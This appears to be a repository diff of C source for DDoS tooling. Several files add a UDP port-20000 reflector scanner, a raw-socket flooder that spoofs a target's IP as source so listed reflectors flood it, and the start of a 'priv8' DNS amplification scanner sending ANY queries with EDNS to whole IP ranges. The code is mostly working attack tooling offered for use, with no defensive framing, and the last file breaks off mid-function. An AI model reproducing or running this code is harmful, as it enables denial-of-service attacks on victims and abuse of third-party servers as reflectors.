sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <ip range start (192.168.0.0)> <ip range end (192.168.255.255)> <outfile> <threads> <scan delay in ms>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
int num_threads = atoi(argv[4]);
|
||||
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_nofile");
|
||||
fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);
|
||||
}
|
||||
bzero(&rl, sizeof(struct rlimit));
|
||||
rl.rlim_cur = 256 * 1024;
|
||||
rl.rlim_max = 4096 * 1024;
|
||||
result = setrlimit(RLIMIT_STACK, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_stack");
|
||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
||||
}
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
pcap_if_t *alldevsp;
|
||||
pcap_t *handle; //Handle of the device that shall be sniffed
|
||||
|
||||
char errbuf[100] , *devname , devs[100][100];
|
||||
int count = 1 , n;
|
||||
|
||||
if( pcap_findalldevs( &alldevsp , errbuf) )
|
||||
{
|
||||
exit(1);
|
||||
}
|
||||
|
||||
devname = alldevsp->name;
|
||||
ipv4 = malloc(16);
|
||||
bzero(ipv4, 16);
|
||||
struct ifreq ifc;
|
||||
int res;
|
||||
int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
|
||||
if(sockfd < 0) exit(-1);
|
||||
strcpy(ifc.ifr_name, devname);
|
||||
res = ioctl(sockfd, SIOCGIFADDR, &ifc);
|
||||
close(sockfd);
|
||||
if(res < 0) exit(-1);
|
||||
strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));
|
||||
printf("Opening device %s for sniffing ... " , devname);
|
||||
handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);
|
||||
|
||||
if (handle == NULL)
|
||||
{
|
||||
fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);
|
||||
exit(1);
|
||||
}
|
||||
printf("Done\n");
|
||||
|
||||
sem_init(&loop_sem, 0, -1);
|
||||
i = 1024*1000;
|
||||
while(i--)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(head, sizeof(struct buffer));
|
||||
head->data = NULL;
|
||||
head->size = 0;
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(new_node, sizeof(struct buffer));
|
||||
new_node->data = NULL;
|
||||
new_node->size = 0;
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_t prnthread;
|
||||
pthread_create( &prnthread, NULL, &printthread, (void *)argv);
|
||||
pthread_t redthread;
|
||||
pthread_create( &redthread, NULL, &readthread, NULL);
|
||||
|
||||
pcap_loop(handle , -1 , process_packet , NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)
|
||||
{
|
||||
int size = header->len;
|
||||
|
||||
//Get the IP Header part of this packet , excluding the ethernet header
|
||||
struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));
|
||||
memset(&dest, 0, sizeof(dest));
|
||||
dest.sin_addr.s_addr = iph->daddr;
|
||||
|
||||
if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)
|
||||
{
|
||||
//toss into buffer
|
||||
if(head->data != NULL) over++;
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *temp = malloc(size);
|
||||
memcpy(temp, buffer, size);
|
||||
head->data = temp;
|
||||
head->size = size;
|
||||
head = head->next;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
sem_post(&loop_sem);
|
||||
total++;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,211 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 1;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(20000);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "0x01", 1);
|
||||
udph->len=htons(sizeof(struct udphdr) + 1);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,306 @@
|
|||
#include <pcap.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h> // for exit()
|
||||
#include <string.h> //for memset
|
||||
#include <sys/ioctl.h>
|
||||
#include <net/if.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h> // for inet_ntoa()
|
||||
#include <net/ethernet.h>
|
||||
#include <netinet/udp.h> //Provides declarations for udp header
|
||||
#include <netinet/ip.h> //Provides declarations for ip header
|
||||
#include <pthread.h>
|
||||
#include <semaphore.h>
|
||||
#include <signal.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
static unsigned int payloadsize = 1;
|
||||
static unsigned int xport = 20000;
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);
|
||||
|
||||
struct buffer
|
||||
{
|
||||
void *data;
|
||||
int size;
|
||||
struct buffer *next;
|
||||
struct buffer *prev;
|
||||
};
|
||||
struct buffer *head;
|
||||
|
||||
char *ipv4;
|
||||
int processed,over,total,i,j;
|
||||
struct sockaddr_in dest;
|
||||
pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
sem_t loop_sem;
|
||||
int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void *readthread()
|
||||
{
|
||||
struct buffer *ourhead = head;
|
||||
struct sockaddr_in saddr;
|
||||
while(1)
|
||||
{
|
||||
sem_wait(&loop_sem);
|
||||
while(ourhead->data == NULL){ ourhead = ourhead->next; }
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *buf = malloc(ourhead->size);
|
||||
int size = ourhead->size;
|
||||
memcpy(buf, ourhead->data, ourhead->size);
|
||||
free(ourhead->data);
|
||||
ourhead->data = NULL;
|
||||
ourhead->size = 0;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
memset(&saddr, 0, sizeof(saddr));
|
||||
struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));
|
||||
saddr.sin_addr.s_addr = iph->saddr;
|
||||
struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));
|
||||
if(ntohs(udph->source) == xport)
|
||||
{
|
||||
int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
found_srvs++;
|
||||
}
|
||||
free(buf);
|
||||
processed++;
|
||||
ourhead = ourhead->next;
|
||||
}
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memcpy(buf, "\x00", payloadsize);
|
||||
int sizeofpayload = payloadsize;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(xport);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=sizeofpayload;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
usleep(sleep_between*1000);
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *printthread(void *argvs)
|
||||
{
|
||||
char **argv = (char **)argvs;
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
sleep(1);
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
sleep(1);
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Found");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Host/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "B/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Running Thrds");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Done");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <ip range start (192.168.0.0)> <ip range end (192.168.255.255)> <outfile> <threads> <scan delay in ms>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
int num_threads = atoi(argv[4]);
|
||||
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_nofile");
|
||||
fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);
|
||||
}
|
||||
bzero(&rl, sizeof(struct rlimit));
|
||||
rl.rlim_cur = 256 * 1024;
|
||||
rl.rlim_max = 4096 * 1024;
|
||||
result = setrlimit(RLIMIT_STACK, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_stack");
|
||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
||||
}
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
pcap_if_t *alldevsp;
|
||||
pcap_t *handle; //Handle of the device that shall be sniffed
|
||||
|
||||
char errbuf[100] , *devname , devs[100][100];
|
||||
int count = 1 , n;
|
||||
|
||||
if( pcap_findalldevs( &alldevsp , errbuf) )
|
||||
{
|
||||
exit(1);
|
||||
}
|
||||
|
||||
devname = alldevsp->name;
|
||||
ipv4 = malloc(16);
|
||||
bzero(ipv4, 16);
|
||||
struct ifreq ifc;
|
||||
int res;
|
||||
int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
|
||||
if(sockfd < 0) exit(-1);
|
||||
strcpy(ifc.ifr_name, devname);
|
||||
res = ioctl(sockfd, SIOCGIFADDR, &ifc);
|
||||
close(sockfd);
|
||||
if(res < 0) exit(-1);
|
||||
strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));
|
||||
printf("Opening device %s for sniffing ... " , devname);
|
||||
handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);
|
||||
|
||||
if (handle == NULL)
|
||||
{
|
||||
fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);
|
||||
exit(1);
|
||||
}
|
||||
printf("Done\n");
|
||||
|
||||
sem_init(&loop_sem, 0, -1);
|
||||
i = 1024*1000;
|
||||
while(i--)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(head, sizeof(struct buffer));
|
||||
head->data = NULL;
|
||||
head->size = 0;
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(new_node, sizeof(struct buffer));
|
||||
new_node->data = NULL;
|
||||
new_node->size = 0;
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_t prnthread;
|
||||
pthread_create( &prnthread, NULL, &printthread, (void *)argv);
|
||||
pthread_t redthread;
|
||||
pthread_create( &redthread, NULL, &readthread, NULL);
|
||||
|
||||
pcap_loop(handle , -1 , process_packet , NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)
|
||||
{
|
||||
int size = header->len;
|
||||
|
||||
//Get the IP Header part of this packet , excluding the ethernet header
|
||||
struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));
|
||||
memset(&dest, 0, sizeof(dest));
|
||||
dest.sin_addr.s_addr = iph->daddr;
|
||||
|
||||
if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)
|
||||
{
|
||||
//toss into buffer
|
||||
if(head->data != NULL) over++;
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *temp = malloc(size);
|
||||
memcpy(temp, buffer, size);
|
||||
head->data = temp;
|
||||
head->size = size;
|
||||
head = head->next;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
sem_post(&loop_sem);
|
||||
total++;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,301 @@
|
|||
/* priv8 dns amp scanner. lel */
|
||||
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <signal.h>
|
||||
#include <sys/time.h>
|
||||
#include <sys/types.h>
|
||||
#include <math.h>
|
||||
#include <stropts.h>
|
||||
#include <ctype.h>
|
||||
#include <errno.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
|
||||
struct DNS_HEADER
|
||||
{
|
||||
unsigned short id; // identification number
|
||||
|
||||
unsigned char rd :1; // recursion desired
|
||||
unsigned char tc :1; // truncated message
|
||||
unsigned char aa :1; // authoritive answer
|
||||
unsigned char opcode :4; // purpose of message
|
||||
unsigned char qr :1; // query/response flag
|
||||
|
||||
unsigned char rcode :4; // response code
|
||||
unsigned char cd :1; // checking disabled
|
||||
unsigned char ad :1; // authenticated data
|
||||
unsigned char z :1; // its z! reserved
|
||||
unsigned char ra :1; // recursion available
|
||||
|
||||
unsigned short q_count; // number of question entries
|
||||
unsigned short ans_count; // number of answer entries
|
||||
unsigned short auth_count; // number of authority entries
|
||||
unsigned short add_count; // number of resource entries
|
||||
};
|
||||
|
||||
struct QUESTION
|
||||
{
|
||||
unsigned short qtype;
|
||||
unsigned short qclass;
|
||||
};
|
||||
|
||||
#pragma pack(push, 1)
|
||||
struct R_DATA
|
||||
{
|
||||
unsigned short type;
|
||||
unsigned short _class;
|
||||
unsigned int ttl;
|
||||
unsigned short data_len;
|
||||
};
|
||||
#pragma pack(pop)
|
||||
|
||||
struct RES_RECORD
|
||||
{
|
||||
unsigned char *name;
|
||||
struct R_DATA *resource;
|
||||
unsigned char *rdata;
|
||||
};
|
||||
|
||||
typedef struct
|
||||
{
|
||||
unsigned char *name;
|
||||
struct QUESTION *ques;
|
||||
} QUERY;
|
||||
|
||||
volatile int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
volatile int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)
|
||||
{
|
||||
int lock = 0 , i;
|
||||
strcat((char*)host,".");
|
||||
|
||||
for(i = 0 ; i < strlen((char*)host) ; i++)
|
||||
{
|
||||
if(host[i]=='.')
|
||||
{
|
||||
*dns++ = i-lock;
|
||||
for(;lock<i;lock++)
|
||||
{
|
||||
*dns++=host[lock];
|
||||
}
|
||||
lock++;
|
||||
}
|
||||
}
|
||||
*dns++='\0';
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char *host = (unsigned char *)malloc(50);
|
||||
strcpy((char *)host, ".");
|
||||
unsigned char buf[65536],*qname;
|
||||
struct DNS_HEADER *dns = NULL;
|
||||
struct QUESTION *qinfo = NULL;
|
||||
dns = (struct DNS_HEADER *)&buf;
|
||||
|
||||
dns->id = (unsigned short) htons(rand());
|
||||
dns->qr = 0;
|
||||
dns->opcode = 0;
|
||||
dns->aa = 0;
|
||||
dns->tc = 0;
|
||||
dns->rd = 1;
|
||||
dns->ra = 0;
|
||||
dns->z = 0;
|
||||
dns->ad = 0;
|
||||
dns->cd = 0;
|
||||
dns->rcode = 0;
|
||||
dns->q_count = htons(1);
|
||||
dns->ans_count = 0;
|
||||
dns->auth_count = 0;
|
||||
dns->add_count = htons(1);
|
||||
qname =(unsigned char*)&buf[sizeof(struct DNS_HEADER)];
|
||||
|
||||
ChangetoDnsNameFormat(qname , host);
|
||||
qinfo =(struct QUESTION*)&buf[sizeof(struct DNS_HEADER) + (strlen((const char*)qname) + 1)];
|
||||
|
||||
qinfo->qtype = htons( 255 );
|
||||
qinfo->qclass = htons(1);
|
||||
|
||||
void *edns = (void *)qinfo + sizeof(struct QUESTION)+1;
|
||||
memset(edns, 0x00, 1);
|
||||
memset(edns+1, 0x29, 1);
|
||||
memset(edns+2, 0xFF, 2);
|
||||
memset(edns+4, 0x00, 7);
|
||||
|
||||
int sizeofpayload = sizeof(struct DNS_HEADER) + (strlen((const char *)qname)+1) + sizeof(struct QUESTION) + 11;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(53);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=24;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
usleep(sleep_between*1000);
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void recievethread()
|
||||
{
|
||||
printf("Started Listening Thread\n");
|
||||
int saddr_size, data_size, sock_raw;
|
||||
struct sockaddr_in saddr;
|
||||
struct in_addr in;
|
||||
|
||||
unsigned char *buffer = (unsigned char *)malloc(65536);
|
||||
sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);
|
||||
if(sock_raw < 0)
|
||||
{
|
||||
printf("Socket Error\n");
|
||||
exit(1);
|
||||
}
|
||||
while(1)
|
||||
{
|
||||
saddr_size = sizeof saddr;
|
||||
data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);
|
||||
